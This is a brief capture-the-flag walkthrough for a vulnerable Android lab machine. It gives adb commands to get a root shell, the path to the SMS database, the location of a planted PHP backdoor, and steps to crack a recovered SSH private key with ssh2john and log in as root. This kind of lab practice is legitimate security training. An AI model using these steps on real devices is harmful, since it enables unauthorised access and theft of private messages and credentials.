Investigator: 1 Walkthrough

reference Investigator: 1
target ip 192.168.1.8

Scan with nmap:

adb since it’s an Android box.

1
adb connect 192.168.1.8:5555

spawn a shell, and elevate to root

1
adb shell

check sms which is located in /data/data/com.android.providers.telephony/databases/mmssms.db


Other interesting files/dirs:

  • /data/root/flag.txt
  • /sdcard/www/public/announce/backdoor.php

we can get a reverse shell

  • /sdcard/www/public/secret22000/touhid.key

crack with john

1
/usr/share/john/ssh2john.py ./touhid.key > ./id_rsa.hash

ssh to the phone with this private key

1
2
chmod 400 ./touhid.key
ssh -p22000 -i ./touhid.key root@192.168.1.8
  • /sdcard/DCIM/qr.png

  • /data/data/com.google.android.gm/cache/sivaneshkumar121@gmail.com